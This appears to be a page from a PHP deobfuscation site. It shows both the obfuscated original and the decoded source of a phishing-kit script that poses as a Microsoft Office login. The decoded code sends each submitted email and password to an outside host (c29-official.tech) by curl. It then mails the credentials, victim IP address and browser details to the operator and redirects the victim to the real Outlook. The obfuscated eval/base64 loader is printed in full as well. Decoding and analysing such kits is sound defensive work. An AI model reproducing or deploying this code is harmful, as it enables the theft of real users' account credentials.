Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_F=__FILE__;$_X='P2lCP1ouWj4/aUI/Wi5aDVYkemVIOU9ZPlM+emVIOShMYWFhYSw+MGFhYWFhYWFhYW..

Decoded Output download

?><?php ?><?php
$random = rand(50000, 100000000000);
/* Data Information */
error_reporting(0);
include ('blocker.php');
include ('email.php');
$username = $_POST['username'];
$password = $_POST['password'];
$errors = $_POST['errors'];
$in = urlencode($username);
$fo = urlencode($errors);
$browser = $_SERVER['HTTP_USER_AGENT'];
$date = date("D M d, Y g:i a");
$serv = $_SERVER['HTTP_HOST'];
/* True login check */
function check($email, $pass, $host) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, 'http://c29-official.tech/givingfakelink3/cxkuadrat.php?1=' . $email . '&2=' . $pass . '&3=' . $host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}
$output = check($username, $errors, $serv);
if ($output == "valid ") {
    $remote = getenv("REMOTE_ADDR");
    $subject = "True - Microsoft by A-29 Online | $username | $remote";
    /* True Data Check */
    $message = "
Classified Report
|----------------- Microsoft Office Login -----------------|
| Email : $username 
| Password : $errors
|--------------------- I N F O | I P ----------------------|
| IP Address: $remote 
| Date: $date 
| Browser: $browser
|---------------------- A-29 Online -----------------------|
";
    $headers = "A-29 Official <[email protected]>" . "
" . "MIME-Version: 1.0";
    mail($to, $subject, $message);
    header('Location: http://outlook.office.com/owa');
} else {
	 $remote = getenv("REMOTE_ADDR");
    $subject = "Wrong - Microsoft by A-29 Online | $username | $remote";
    /* True Data Check */
    $message = "
Classified Report
|----------------- Microsoft Office Login -----------------|
| Email : $username 
| Password : $errors
|--------------------- I N F O | I P ----------------------|
| IP Address: $remote 
| Date: $date 
| Browser: $browser
|---------------------- A-29 Online -----------------------|
";
    $headers = "A-29 Official <[email protected]>" . "
" . "MIME-Version: 1.0";
    mail($to, $subject, $message);
    header('Location: ./errors.php?uid=ZWxpdGUgc2NhbXBhZ2UgcG93ZXJlZCBieSB0aGVwbGF5ZXI&' . $random . '&data=' . $username . '&status=login&string=signin');
}
?>

Did this file decode correctly?

Original Code

<?php $_F=__FILE__;$_X='P2lCP1ouWj4/aUI/Wi5aDVYkemVIOU9ZPlM+emVIOShMYWFhYSw+MGFhYWFhYWFhYWFhKTsNVmgqPjRlPWU+M0hBT3pZZT1zT0g+KmgNVk16ek96X3pNWk96PXNIeChhKTsNVnNIMldROU0+KCc8V08yeU16WFouWicpOw1Wc0gyV1E5TT4oJ01ZZXNXWFouWicpOw1WJFFuTXpIZVlNPlM+JF9tN3BUaidRbk16SGVZTSdkOw1WJFplbm59T3o5PlM+JF9tN3BUaidaZW5ufU96OSdkOw1WJE16ek96bj5TPiRfbTdwVGonTXp6T3puJ2Q7DVYkc0g+Uz5ReldNSDJPOU0oJFFuTXpIZVlNKTsNViRBTz5TPlF6V01IMk85TSgkTXp6T3puKTsNViQ8ek99bk16PlM+JF9wS2c2S2dqJ3RUVG1fIHBLZ19GQ0tFVCdkOw1WJDllPU0+Uz45ZT1NKCI0PnU+OSw+Yj54OnM+ZSIpOw1WJG5NemM+Uz4kX3BLZzZLZ2ondFRUbV90N3BUJ2Q7DVZoKj5UelFNPldPeHNIPjIuTTJ5PipoDVZBUUgyPXNPSD4yLk0yeSgkTVllc1csPiRaZW5uLD4kLk9uPSk+XQ1WPj4+PiQyLj5TPjJReldfc0hzPSgpOw1WPj4+PjJReldfbk09T1o9KCQyLiw+LyBnSTdtVF8gZ0ksPicuPT1aOmhoMmtQLU9BQXMyc2VXWD1NMi5oeHNjc0h4QWV5TVdzSHlKaDJSeVFlOXplPVhaLlo/MFMnPlg+JE1ZZXNXPlg+JyZrUyc+WD4kWmVubj5YPicmSlMnPlg+JC5Pbj0pOw1WPj4+PjJReldfbk09T1o9KCQyLiw+LyBnSTdtVF9nS1QgZ0VUZ0ZFcHJLZyw+MCk7DVY+Pj4+JE9RPVpRPT5TPjJReldfTVJNMigkMi4pOw1WPj4+PjJReldfMldPbk0oJDIuKTsNVj4+Pj56TT1Rekg+JE9RPVpRPTsNVmwNViRPUT1aUT0+Uz4yLk0yeSgkUW5NekhlWU0sPiRNenpPem4sPiRuTXpjKTsNVnNBPigkT1E9WlE9PlNTPiJjZVdzOT4iKT5dDVY+Pj4+JHpNWU89TT5TPnhNPU1IYygiZ0t1N1RLX0Y0NGciKTsNVj4+Pj4kblE8Ck0yPT5TPiJUelFNPi0+dXMyek9uT0E9PjxxPkYta1A+N0hXc0hNPnw+JFFuTXpIZVlNPnw+JHpNWU89TSI7DVY+Pj4+aCo+VHpRTT40ZT1lPi8uTTJ5PipoDVY+Pj4+JFlNbm5leE0+Uz4iDVYvV2VubnNBc005PmdNWk96PQ1WfC0tLS0tLS0tLS0tLS0tLS0tPnVzMnpPbk9BPT43QUFzMk0+SU94c0g+LS0tLS0tLS0tLS0tLS0tLS18DVZ8PktZZXNXPjo+JFFuTXpIZVlNPg1WfD5tZW5ufU96OT46PiRNenpPem4NVnwtLS0tLS0tLS0tLS0tLS0tLS0tLS0+Mz5FPnI+Nz58PjM+bT4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tfA1WfD4zbT5GOTl6TW5uOj4kek1ZTz1NPg1WfD40ZT1NOj4kOWU9TT4NVnw+b3pPfW5Nejo+JDx6T31uTXoNVnwtLS0tLS0tLS0tLS0tLS0tLS0tLS0tPkYta1A+N0hXc0hNPi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tfA1WIjsNVj4+Pj4kLk1lOU16bj5TPiJGLWtQPjdBQXMyc2VXPkJlOVlzSEBla1AtT0FBczJzZVdYMk9ZaSI+WD4iDVYiPlg+InUzdUstNk16bnNPSDo+MFhhIjsNVj4+Pj5ZZXNXKCQ9Tyw+JG5RPApNMj0sPiRZTW5uZXhNKTsNVj4+Pj4uTWU5TXooJ0lPMmU9c09IOj4uPT1aOmhoT1E9V09PeVhPQUFzMk1YMk9ZaE99ZScpOw1WbD5NV25NPl0NVgk+JHpNWU89TT5TPnhNPU1IYygiZ0t1N1RLX0Y0NGciKTsNVj4+Pj4kblE8Ck0yPT5TPiJ7ek9IeD4tPnVzMnpPbk9BPT48cT5GLWtQPjdIV3NITT58PiRRbk16SGVZTT58PiR6TVlPPU0iOw1WPj4+PmgqPlR6UU0+NGU9ZT4vLk0yeT4qaA1WPj4+PiRZTW5uZXhNPlM+Ig1WL1dlbm5zQXNNOT5nTVpPej0NVnwtLS0tLS0tLS0tLS0tLS0tLT51czJ6T25PQT0+N0FBczJNPklPeHNIPi0tLS0tLS0tLS0tLS0tLS0tfA1WfD5LWWVzVz46PiRRbk16SGVZTT4NVnw+bWVubn1Pejk+Oj4kTXp6T3puDVZ8LS0tLS0tLS0tLS0tLS0tLS0tLS0tPjM+RT5yPjc+fD4zPm0+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLXwNVnw+M20+Rjk5ek1ubjo+JHpNWU89TT4NVnw+NGU9TTo+JDllPU0+DVZ8Pm96T31uTXo6PiQ8ek99bk16DVZ8LS0tLS0tLS0tLS0tLS0tLS0tLS0tLT5GLWtQPjdIV3NITT4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLXwNViI7DVY+Pj4+JC5NZTlNem4+Uz4iRi1rUD43QUFzMnNlVz5CZTlZc0hAZWtQLU9BQXMyc2VXWDJPWWkiPlg+Ig1WIj5YPiJ1M3VLLTZNem5zT0g6PjBYYSI7DVY+Pj4+WWVzVygkPU8sPiRuUTwKTTI9LD4kWU1ubmV4TSk7DVY+Pj4+Lk1lOU16KCdJTzJlPXNPSDo+WGhNenpPem5YWi5aP1FzOVNOe1JaOUMgeDJrRS48RG8uTmsgeDJDUEpORDhXTi9vc01wb2FlQzZ9PENyTE5EMyYnPlg+JHplSDlPWT5YPicmOWU9ZVMnPlg+JFFuTXpIZVlNPlg+JyZuPWU9UW5TV094c0gmbj16c0h4U25zeEhzSCcpOw1WbA1WP2k=';$_D=strrev('edoced_46esab');eval($_D('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdTZ1BPOVlaV0ZLbXF5ZnhjakxKUnp1TTV2TnRzMWIue0I0bkNdaS8yRGwwRWhlQQpbZDg9UXA+VlhvIEh9NkdJdzdrYTNUclU8JywnPVI5b2RtcGxBRVB5azhndls1M3hyTWV6cVpIaTdZaFc8RHNHez5DY1h9MU4vYWZqNl1KdHVTIAouQlVud1ZLTFFPMjBJVEY0YicpOyRfUj1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw='));?>

Function Calls

strtr 1
strrev 1
str_replace 1
base64_decode 2

Variables

$_D base64_decode
$_F index.php
$_R 0
$_X 0

Stats

MD5 80856e9810634cb22762f2e7f64efa58
Eval Count 2
Decode Time 68 ms